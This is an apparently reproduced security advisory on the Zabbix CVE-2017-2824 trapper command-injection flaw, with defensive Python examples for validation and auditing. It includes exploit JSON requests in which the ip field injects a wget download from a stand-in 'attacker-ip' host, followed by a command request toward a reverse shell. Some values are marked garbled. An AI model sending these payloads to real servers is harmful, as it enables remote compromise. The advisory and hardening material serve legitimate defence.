CVE-2017-2824: Zabbix high-risk remote code execution vulnerability

Source: Internet
Author: User
Tags: cve

About Zabbix

Zabbix is an enterprise-class open source solution with a Web-based interface that provides distributed system monitoring and network monitoring capabilities.

Zabbix can monitor various network parameters, ensure the safe operation of server systems, and provides a flexible notification mechanism that lets system administrators quickly locate and solve problems.

Vulnerability Details

CVE-2017-2824: Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability

The Trapper command feature of Zabbix 2.4.x contains a code execution vulnerability: a specially crafted packet can cause command injection and remote code execution. An attacker triggers it by sending a request that originates from, or impersonates, a Zabbix proxy.

Affected Versions

Zabbix 2.4.7 to 2.4.8r1

Vulnerability Description

The vulnerability lies in the "Trapper" code of Zabbix, whose main purpose is to let proxies and the server communicate over a network service (TCP port 10051). Through it, Zabbix Server exposes a set of API calls to Zabbix Proxy; the two that matter here are the "discovery data" and "command" requests. Sample data for these requests is shown below:

{"request": "command", "scriptid": 1, "hostid": 10001}
{"request": "discovery data", "host": "zabbix-proxy.com", "clock": (value garbled in the source), "data": [{"clock": 10, "drule": 1, "dcheck": 2, "type": 0, "ip": "10.0.0.1", "dns": "zabbix-agent.com", "port": 10050, "key": "test", "status": 0, "value": "test_value"}]}

It should be noted that the command request invokes a script stored in the Zabbix database without any authentication. Another key aspect of this vulnerability is that, by default, Zabbix 2.4.x populates the MySQL database with three scripts, listed in the following table:

The problem is that when a script is invoked, the {HOST.CONN} macro is replaced with the host's IP address. The value substituted for {HOST.CONN} comes from the Zabbix interface table, where it is stored in the "ip" field of type varchar(64). Therefore, if an attacker can create an interface whose IP address field contains a command injection payload and then run a script containing {HOST.CONN} via a "command" request, command injection occurs and a reverse shell can be obtained.
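The following is an added example, not Zabbix code and not code from the original article. It contrasts the unsafe behaviour just described (plain text substitution of {HOST.CONN} into a command string that a shell later runs) with a hardened version that allow-lists the value and builds an argument vector instead of a shell string. The script template is an assumption modelled on the style of the default scripts; the exact default commands are not reproduced from the page.

```python
"""Added example (not Zabbix code): unsafe substitution of {HOST.CONN} into a
shell command string, next to a hardened version that validates the value
and never hands it to a shell."""
import ipaddress
import re

MACRO = "{HOST.CONN}"

# Assumed script template, modelled on the style of Zabbix's default scripts.
SCRIPT_TEMPLATE = "/bin/ping -c 3 {HOST.CONN} 2>&1"

# RFC 1123 style hostname labels; the 64-character cap below matches the
# varchar(64) interface.ip column described in the article.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


def render_vulnerable(template: str, host_conn: str) -> str:
    """What the affected code effectively does: text substitution into a
    string that is later handed to a shell. Returned as a string and never
    executed here, so the injected separators are visible in the result."""
    return template.replace(MACRO, host_conn)


def validate_host_conn(value: str) -> str:
    """Allow-list check: the macro may only expand to an IP address or a
    hostname. Anything else (spaces, ';', '#', quotes, ...) is rejected."""
    if len(value) > 64:
        raise ValueError("value exceeds the 64-character interface.ip column")
    try:
        ipaddress.ip_address(value)
        return value
    except ValueError:
        pass
    if _HOSTNAME.match(value):
        return value
    raise ValueError(f"not an IP address or hostname: {value!r}")


def build_argv(template_argv: list, host_conn: str) -> list:
    """Hardened form: substitute into an argument vector element by element,
    so the value stays a single argv entry and no shell re-parses it. The
    result is meant for subprocess.run(argv) without shell=True."""
    value = validate_host_conn(host_conn)
    return [value if arg == MACRO else arg for arg in template_argv]


if __name__ == "__main__":
    print(render_vulnerable(SCRIPT_TEMPLATE, "10.0.0.1"))
    print(render_vulnerable(SCRIPT_TEMPLATE, "; id;#"))  # separators survive
    print(build_argv(["/bin/ping", "-c", "3", MACRO], "10.0.0.1"))
    try:
        build_argv(["/bin/ping", "-c", "3", MACRO], "; id;#")
    except ValueError as exc:
        print("rejected:", exc)
```

The allow-list is the primary control; the argv construction is defence in depth, since even a value that slipped past validation would reach the program as one literal argument rather than as shell syntax.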

The difficulty lies in getting values inserted into the Zabbix host table. By default, an unauthenticated attacker cannot do this; it requires additional configuration by the system administrator, specifically of the Zabbix automatic discovery feature.

The Zabbix automatic discovery and auto-registration feature allows the Zabbix server to be configured based on data supplied by a Zabbix proxy. More specifically, if a host reports certain characteristics to the Zabbix proxy, then, depending on the server's configuration, certain actions may be taken, one of which adds the newly discovered host to several Zabbix database tables. In that case the host is inserted into the "hosts" table, an entry is created in the Zabbix interface table, and the IP address reported for the host is written to the "ip" column without any validation of that address.

Therefore, a command injection payload can be written into the database by sending a discovery data request with a suitably crafted host to the server:

write_script_cmd = '{
    "request": "discovery data",
    "host": "zabbix-proxy.domain.fake",
    "clock": 148535399,
    "data": [{
        "clock": 1485353070,
        "drule": (value garbled in the source),
        "dcheck": 174,
        "type": 0,
        "ip": "; wget-o/tmp/shttp://attacker-ip/s;#",
        "dns": "host28.domain.fake",
        "port": 10050,
        "key": "sectest",
        "status": 0,
        "value": "lnx< (^_^) >host"
    }]
}'

Because the ip field of the Zabbix interface table is limited in size, a second host is inserted into the table with a different IP address value.

run_cmd = '{
    "request": "command",
    "scriptid": 1,
    "hostid": 14666
}'

After the two hosts are added, one problem remains: the hostid needed for the command request is unknown, but this is easy to solve. The hostid can be brute-forced against the database because different command requests return different responses, which reveals whether a host exists; once the host is identified, the script can be invoked directly and a reverse shell obtained.

Remediation

1. Upgrade to a fixed version as soon as the vendor releases one. According to the vendor, the fix will be included in the following versions: 2.0.21rc1, 2.2.18rc1, 3.0.9rc1, 3.2.5rc1, 3.4.0ALPHA1 (trunk).

2. Mitigation: delete the default script entries from the Zabbix database. Either manipulate the database directly with the following SQL:

USE zabbix;
DELETE FROM scripts;

or delete them from the web interface (Administration -> Scripts -> tick the scripts -> Delete Selected).
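As an added example (not Zabbix's own code and not part of the original article), the script below audits the two conditions this vulnerability chains together: scripts that expand {HOST.CONN}, and interface rows whose connection address carries shell metacharacters, which is what an injected discovery data request leaves behind. It runs over constructed rows shaped like the scripts and interface tables instead of a live MySQL connection, and it produces a targeted variant of the page's DELETE statement that removes only the scripts that expand the macro.

```python
"""Added example (not Zabbix code): audit the scripts and interface tables
for the conditions that make CVE-2017-2824 exploitable, using constructed
rows in place of a live MySQL connection."""
import re

MACRO = "{HOST.CONN}"
# Characters that mean something to /bin/sh; a real IP or DNS name never
# contains any of them, so their presence in an address column is a finding.
SHELL_META = re.compile(r"[;&|`$<>(){}\s\\\"']")

# Constructed rows shaped like the Zabbix scripts table.
SCRIPTS = [
    {"scriptid": 1, "name": "Ping", "command": "/bin/ping -c 3 {HOST.CONN} 2>&1"},
    {"scriptid": 2, "name": "Traceroute", "command": "/usr/bin/traceroute {HOST.CONN} 2>&1"},
    {"scriptid": 3, "name": "Local report", "command": "/usr/local/bin/report.sh"},
]

# Constructed rows shaped like the Zabbix interface table; useip=1 means the
# ip column is used to reach the host, useip=0 means the dns column is.
INTERFACES = [
    {"interfaceid": 1, "hostid": 10001, "useip": 1, "ip": "10.0.0.1", "dns": ""},
    {"interfaceid": 2, "hostid": 14666, "useip": 1, "ip": "; id #", "dns": "host28.domain.fake"},
    {"interfaceid": 3, "hostid": 14667, "useip": 0, "ip": "127.0.0.1", "dns": "agent$(id).example"},
]


def scripts_using_host_conn(scripts):
    """Scripts whose command expands {HOST.CONN}: the ones the vulnerability
    abuses and the ones the mitigation removes."""
    return [s["scriptid"] for s in scripts if MACRO in s["command"]]


def tainted_interfaces(interfaces):
    """Interfaces whose effective connection address (ip or dns, according to
    useip) contains shell metacharacters."""
    found = []
    for row in interfaces:
        address = row["ip"] if row["useip"] == 1 else row["dns"]
        if SHELL_META.search(address):
            found.append(row["interfaceid"])
    return found


def audit(scripts, interfaces):
    """Combine both checks; the chain is exploitable only when a macro-using
    script exists and a tainted address can be substituted into it."""
    exposed = scripts_using_host_conn(scripts)
    tainted = tainted_interfaces(interfaces)
    return {
        "exposed_scripts": exposed,
        "tainted_interfaces": tainted,
        "exploitable": bool(exposed and tainted),
    }


def deletion_sql(scriptids):
    """Targeted form of the page's `DELETE FROM scripts;` that removes only
    the scripts that expand the macro. Returns None when there is nothing to
    delete."""
    if not scriptids:
        return None
    ids = ", ".join(str(int(i)) for i in sorted(scriptids))
    return f"DELETE FROM scripts WHERE scriptid IN ({ids});"


if __name__ == "__main__":
    result = audit(SCRIPTS, INTERFACES)
    print(result)
    print(deletion_sql(result["exposed_scripts"]))
```

On a real deployment the two lists would be fetched with `SELECT scriptid, command FROM scripts` and `SELECT interfaceid, hostid, useip, ip, dns FROM interface`; a non-empty tainted_interfaces list after the scripts are deleted still indicates that an injection attempt reached the database and the discovery and auto-registration actions deserve review.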


This article is reproduced from: http://www.linuxprobe.com/zabbix-bug-cve.html
